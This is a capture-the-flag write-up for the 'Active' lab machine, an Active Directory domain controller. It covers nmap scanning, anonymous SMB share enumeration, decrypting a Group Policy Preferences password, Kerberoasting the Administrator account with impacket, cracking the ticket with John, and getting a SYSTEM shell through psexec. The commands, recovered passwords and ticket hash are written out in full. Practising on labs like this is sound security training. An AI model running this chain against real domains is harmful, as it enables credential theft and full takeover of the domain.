Active

SMB info leak, GPP, Kerberoast

IP

• LHOST: 10.10.14.15

• RHOST: 10.129.135.20

Nmap

Port scan:

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown

Script scan:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-07-09 14:08:09Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-07-09T14:09:11
|_  start_date: 2022-07-09T14:05:50

Full scan:

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49169/tcp open  unknown
49171/tcp open  unknown
49177/tcp open  unknown



Making a script scan on extra ports: 5722, 9389, 47001, 49169, 49171, 49177



PORT      STATE SERVICE VERSION
5722/tcp  open  msrpc   Microsoft Windows RPC
9389/tcp  open  mc-nmf  .NET Message Framing
47001/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49169/tcp open  msrpc   Microsoft Windows RPC
49171/tcp open  msrpc   Microsoft Windows RPC
49177/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

User Flag (SMB Info Leak, GPP)

SMB Null Session

Enumerate SMB shares:

$ smbmap -H $IP

[+] IP: 10.129.135.20:445	Name: 10.129.135.20                                     
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS

Recursively list directories and files in the share \Replication:

smbmap -H $IP -R Replication --depth 10

Note that the --depth flag is needed, otherwise we won't find the thing we want. Here we found an interesting file named Groups.xml:

Groups.xml

Download Groups.xml to Kali:

smbmap -H $IP -R Replication --depth 10 -A Groups.xml -q

In Groups.xml, we found a username active.htb\SVC_TGS and a GPP password in the cpassword field:

edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPP Password Decryption

GPP password can be easily decrypted with Kali built-in gpp-decrypt tool:

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

The plaintext password is GPPstillStandingStrong2k18. To learn the theory of this attack, read the following post:

Finding Passwords in SYSVOL & Exploiting Group Policy PreferencesActive Directory Security

Finding Passwords in SYSVOL & Exploiting Group Policy Preferences

SMB Enumeration with Credential

Enumerate the SMB shares again with the credential we just obtained:

$ smbmap -H $IP -d 'active.htb' -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'

[+] IP: 10.129.135.20:445	Name: 10.129.135.20                                     
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY

Recursively list directories and files in the share \Users:

smbmap -H $IP -d 'active.htb' -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users --depth 10

Here we found user.txt. Download it to Kali:

smbmap -H $IP -d 'active.htb' -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users --depth 10 -A user.txt -q

Root Flag (Kerberoast)

Now we have a valid username SVC_TGS and its plaintext password GPPstillStandingStrong2k18. In such scenario, we can try Kerberoast in order to get a TGS ticket and crack it offline. To learn the theory behind Kerberoast, read the following post:

How To Attack Kerberos 101m0chan Blog - Info Sec, CTF & Hacking

How To Attack Kerberos 101

Do kerberoast with GetUserSPNS:

$ impacket-GetUserSPNs 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip $IP -request

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2022-07-09 10:06:56.849348             



$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$cff428e912c5afd03d8a2eb0aedfd97b$0b418bf29e27f1495c342e8a8be1bf0882f1a0c50c4e11971114f0221f54177dd5d1309936fdd123e087edef99ba2686cfae610d754fdd0d1abb35b718eb9604f66446c886bd468591aae0d229ece0935dcbd67187656f2e2ae6c5a0d52b2822dacdc2aff41554ce63e4ab76deb5fbe0488efea8371c5aae296bcd4db4cdbfb9372a199d72bba3d8bc14de863c48a581ca3e6e390aa2e1df01d7cacf000b3a70a764beafb01981e4af936dadb31fa173482a98c31081f96a763bad17c54602e411ed6851d432d2a124267fba0ab962ae9ca441133018051288f52376709e5420fee498f17e8e6eed20116a3075e284dcb06e7a4aed71804321c4743dfcf4a9277a93709863579380393ac206f3f45636fd30c78779a51b8b8bd2a49a2beab2dc2d0be832cc10623da976ae9dd9ce8c3a8d78e8af3bf9119b5486374914ea53b912e45e1b3c794712d407333cf1b570adfac84e3436f359ea5d3af494721d8dd5224bb7833a78b86b2858f34c17911e67aaa8448a34891c8fa595ac183fb8f4ca3de974af002a0eb1cea6a6dc69c1cab81381b4b5d067ee79d5c6afd69f60a501b07685059bb515eeb9e13f9dbd6ef13410f06e92c697706680766af6878b7ad230bfb9df5224f3d7db9ac160d91b719fd506b2af28533ec9e7c30151b86cc80a9afb33f623bb9859efcb16c9a2d78e92d545450c7bf6dad4dda042ab267e3557f1b144a36411666ddaf078707b09567c19cf505bfb3da72d50d2317f5610597855376965201285ab1818db0bde667f02c266f9a559492687d2e99b5f930ce4d190d80ac123877f283ee33f6f4819de904a42d0891fc7f6dd6cc067891d5aa95b0ff4ecdd0550ee8546dce2859410415a743b835cefef97b0fb809345448a49f53fb2b77efd9349e3aa47dfd0af266e35f07c22b6d2af022f7b6ec81477bcbb7b3de03a4d35810e3c50da0ad6aafa107e854b31dccfc95f2670305863f8625ecaecd5ab4b80afcfc81a0ff6b6e4d8fc0cd91ff8c7c40a0eeee29c1df1ce1f7fa091ff4819afb2b26ab49180efe9b5c199051eb03115ffee9be164aba38ce90f9defef6c76fc962d360cdf2a55734a1c5f874032e2e39c898e104973c789144f176f1c47c693c5e7bfc2e65df72269b3fdcbf863db4432c4ea7daa71be172e97b061aa83e35efb39d0dcf84e7d4c28675e4e0041fb63d63b0f7e32e29fdb00e93259aa8c504200c817b946f53f32f32a8091cd5650edfd39184a28

Save the TGS ticket to a file named hash.txt:

impacket-GetUserSPNs 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip $IP -request -outputfile hash.txt

Crack the TGS ticket with John:

john-rockyou hash.txt

The plaintext password is Ticketmaster1968:

John

PsExec to SYSTEM shell:

impacket-psexec active.htb/Administrator:Ticketmaster1968@$IP

SYSTEM shell